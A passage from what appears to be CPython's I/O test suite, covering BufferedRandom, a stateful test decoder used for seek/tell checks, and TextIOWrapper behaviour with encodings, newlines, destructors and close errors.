with self.BytesIO(b'abc') as raw:
with self.tp(raw, 100) as f:
self.assertEqual(f.read(1), b'a')
f.write(b"2")
self.assertEqual(f.read(1), b'c')
f.flush()
self.assertEqual(raw.getvalue(), b'a2c')
def test_interleaved_readline_write(self):
with self.BytesIO(b'ab\ncdef\ng\n') as raw:
with self.tp(raw) as f:
f.write(b'1')
self.assertEqual(f.readline(), b'b\n')
f.write(b'2')
self.assertEqual(f.readline(), b'def\n')
f.write(b'3')
self.assertEqual(f.readline(), b'\n')
f.flush()
self.assertEqual(raw.getvalue(), b'1b\n2def\n3\n')
# You can't construct a BufferedRandom over a non-seekable stream.
test_unseekable = None
class CBufferedRandomTest(BufferedRandomTest, SizeofTest):
tp = io.BufferedRandom
def test_constructor(self):
BufferedRandomTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_garbage_collection(self):
CBufferedReaderTest.test_garbage_collection(self)
CBufferedWriterTest.test_garbage_collection(self)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedRandom"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedRandomTest(BufferedRandomTest):
tp = pyio.BufferedRandom
# To fully exercise seek/tell, the StatefulIncrementalDecoder has these
# properties:
# - A single output character can correspond to many bytes of input.
# - The number of input bytes to complete the character can be
# undetermined until the last input byte is received.
# - The number of input bytes can vary depending on previous input.
# - A single input byte can correspond to many characters of output.
# - The number of output characters can be undetermined until the
# last input byte is received.
# - The number of output characters can vary depending on previous input.
class StatefulIncrementalDecoder(codecs.IncrementalDecoder):
"""
For testing seek/tell behavior with a stateful, buffering decoder.
Input is a sequence of words. Words may be fixed-length (length set
by input) or variable-length (period-terminated). In variable-length
mode, extra periods are ignored. Possible words are:
- 'i' followed by a number sets the input length, I (maximum 99).
        When I is set to 0, words are period-terminated.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
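    # Sketch of the state encoding (informational only): after reset(),
    # self.i == self.o == 1, so getstate() returns (b'', 0) because
    # 1 ^ 1 == 0 on both sides and 0*100 + 0 == 0.  A decoder with I=2 and
    # O=6 and an empty buffer would instead report flags 3*100 + 7 == 307,
    # since 2 ^ 1 == 3 and 6 ^ 1 == 7.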
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
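    # Step-by-step reading of the I=2, O=6 case above (informational only):
    # the one-byte word 'i' sets I=0 (variable-length), the word 'i2' sets
    # I=2, the two-byte word 'o6' sets O=6, the word 'xy' is padded with
    # hyphens to six characters and a period is appended ('xy----.'), and
    # the trailing 'z' is flushed by EOF the same way ('z-----.'), giving
    # 'xy----.z-----.'.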
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_uninitialized(self):
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
del t
t = self.TextIOWrapper.__new__(self.TextIOWrapper)
self.assertRaises(Exception, repr, t)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
t.read, 0)
t.__init__(self.MockRawIO())
self.assertEqual(t.read(0), '')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
# Operations independent of the detached stream should still work
repr(t)
self.assertEqual(t.encoding, "ascii")
self.assertEqual(t.errors, "strict")
self.assertFalse(t.line_buffering)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
t.buffer.detach()
repr(t) # Should not raise an exception
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
            # Try to get a user-preferred encoding different from the current
            # locale encoding, to check that TextIOWrapper() uses the current
            # locale encoding and not the user-preferred encoding.
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
        # Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
    # Read in amounts equal to TextIOWrapper._CHUNK_SIZE, which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
        # Test that the text file is closed despite the failed flush,
        # and that flush() is called before the file is closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
